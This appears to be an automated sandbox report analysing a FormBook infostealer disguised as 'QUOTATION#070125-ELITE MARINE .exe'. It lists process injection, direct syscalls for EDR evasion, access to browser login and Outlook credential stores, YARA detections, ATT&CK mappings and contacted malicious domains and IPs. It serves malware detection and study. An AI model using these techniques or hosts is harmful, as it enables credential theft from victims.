              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039288C8 mov eax, dword ptr fs:[00000030h]1_2_039288C8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039288C8 mov eax, dword ptr fs:[00000030h]1_2_039288C8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039308CD mov eax, dword ptr fs:[00000030h]1_2_039308CD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039308CD mov eax, dword ptr fs:[00000030h]1_2_039308CD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A8F0 mov eax, dword ptr fs:[00000030h]1_2_0393A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A8F0 mov eax, dword ptr fs:[00000030h]1_2_0393A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A8F0 mov eax, dword ptr fs:[00000030h]1_2_0393A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A8F0 mov eax, dword ptr fs:[00000030h]1_2_0393A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A8F0 mov eax, dword ptr fs:[00000030h]1_2_0393A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A8F0 mov eax, dword ptr fs:[00000030h]1_2_0393A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039648F0 mov eax, dword ptr fs:[00000030h]1_2_039648F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C88FB mov eax, dword ptr fs:[00000030h]1_2_039C88FB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C819 mov eax, dword ptr fs:[00000030h]1_2_0396C819
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C819 mov eax, dword ptr fs:[00000030h]1_2_0396C819
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0835 mov eax, dword ptr fs:[00000030h]1_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC870 mov eax, dword ptr fs:[00000030h]1_2_039BC870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov ecx, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940F90 mov eax, dword ptr fs:[00000030h]1_2_03940F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8F8B mov eax, dword ptr fs:[00000030h]1_2_039B8F8B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8F8B mov eax, dword ptr fs:[00000030h]1_2_039B8F8B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8F8B mov eax, dword ptr fs:[00000030h]1_2_039B8F8B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934FB6 mov eax, dword ptr fs:[00000030h]1_2_03934FB6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395CFB0 mov eax, dword ptr fs:[00000030h]1_2_0395CFB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395CFB0 mov eax, dword ptr fs:[00000030h]1_2_0395CFB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968FBC mov eax, dword ptr fs:[00000030h]1_2_03968FBC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EEFD3 mov eax, dword ptr fs:[00000030h]1_2_039EEFD3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DAFD0 mov eax, dword ptr fs:[00000030h]1_2_039DAFD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DAFD0 mov eax, dword ptr fs:[00000030h]1_2_039DAFD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DAFD0 mov eax, dword ptr fs:[00000030h]1_2_039DAFD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DAFD0 mov eax, dword ptr fs:[00000030h]1_2_039DAFD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04FFF mov eax, dword ptr fs:[00000030h]1_2_03A04FFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958FFB mov eax, dword ptr fs:[00000030h]1_2_03958FFB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03946FE0 mov eax, dword ptr fs:[00000030h]1_2_03946FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03946FE0 mov ecx, dword ptr fs:[00000030h]1_2_03946FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03946FE0 mov ecx, dword ptr fs:[00000030h]1_2_03946FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03946FE0 mov eax, dword ptr fs:[00000030h]1_2_03946FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03946FE0 mov ecx, dword ptr fs:[00000030h]1_2_03946FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03946FE0 mov ecx, dword ptr fs:[00000030h]1_2_03946FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03946FE0 mov eax, dword ptr fs:[00000030h]1_2_03946FE0
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00690B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00690B62
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00662622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00662622
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0065083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0065083F
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006509D5 SetUnhandledExceptionFilter,0_2_006509D5
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00650C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00650C21

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFC7D729E7F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x3474215Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x347EAA4Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x347D421Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x62FAAF8Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x3476442Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x347D4BDJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x3475662Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x347D614Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x3476386Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x3474A5FJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x3475DBFJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x62F2D9DJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x347D56CJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x3476471Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x62F2FCFJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x347D6B2
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x62F2F5EJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x34764B5Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFCB3EA2651Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 7540Jump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeThread register set: target process: 7540Jump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeThread register set: target process: 7964Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FE1008Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00691201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00691201
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00672BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00672BA5
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069B226 SendInput,keybd_event,0_2_0069B226
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_006B22DA
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00690B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00690B62
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00691663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00691663
              Source: QUOTATION#070125-ELITE MARINE .exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: QUOTATION#070125-ELITE MARINE .exe, RAVCpl64.exe, 00000002.00000002.16200672767.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.11663489590.0000000000DB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: RAVCpl64.exe, 00000002.00000002.16200672767.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.11663489590.0000000000DB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: RAVCpl64.exe, 00000002.00000002.16200672767.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.11663489590.0000000000DB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: RAVCpl64.exe, 00000002.00000002.16200672767.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.11663489590.0000000000DB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ~Program Manager!
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00650698 cpuid 0_2_00650698
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_006A8195
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0068D27A GetUserNameW,0_2_0068D27A
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0066B952 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0066B952
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006342DE

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
              Source: QUOTATION#070125-ELITE MARINE .exeBinary or memory string: WIN_81
              Source: QUOTATION#070125-ELITE MARINE .exeBinary or memory string: WIN_XP
              Source: QUOTATION#070125-ELITE MARINE .exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: QUOTATION#070125-ELITE MARINE .exeBinary or memory string: WIN_XPe
              Source: QUOTATION#070125-ELITE MARINE .exeBinary or memory string: WIN_VISTA
              Source: QUOTATION#070125-ELITE MARINE .exeBinary or memory string: WIN_7
              Source: QUOTATION#070125-ELITE MARINE .exeBinary or memory string: WIN_8

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_006B1204
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_006B1806

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts              		1
              Native API              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		4
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts              		1
              Abuse Elevation Control Mechanism              		1
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
              Valid Accounts              		3
              Obfuscated Files or Information              		NTDS116
              System Information Discovery              		Distributed Component Object Model21
              Input Capture              		4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
              Access Token Manipulation              		1
              DLL Side-Loading              		LSA Secrets241
              Security Software Discovery              		SSH3
              Clipboard Data              		Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
              Process Injection              		2
              Valid Accounts              		Cached Domain Credentials12
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Virtualization/Sandbox Evasion              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586802 Sample: QUOTATION#070125-ELITE  MAR... Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 31 www.furrcali.xyz 2->31 33 www.rpa.asia 2->33 35 15 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Antivirus / Scanner detection for submitted sample 2->41 43 Multi AV Scanner detection for submitted file 2->43 47 6 other signatures 2->47 10 QUOTATION#070125-ELITE  MARINE .exe 1 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 31->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 13 svchost.exe 10->13         started        process6 signatures7 63 Modifies the context of a thread in another process (thread injection) 13->63 65 Maps a DLL or memory area into another process 13->65 67 Queues an APC in another process (thread injection) 13->67 69 Switches to a custom stack to bypass stack traces 13->69 16 RAVCpl64.exe 13->16 injected process8 dnsIp9 25 www.furrcali.xyz 103.106.67.112, 49786, 49787, 49788 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand 16->25 27 www.givvjn.info 47.83.1.90, 49758, 49759, 49760 VODANETInternationalIP-BackboneofVodafoneDE United States 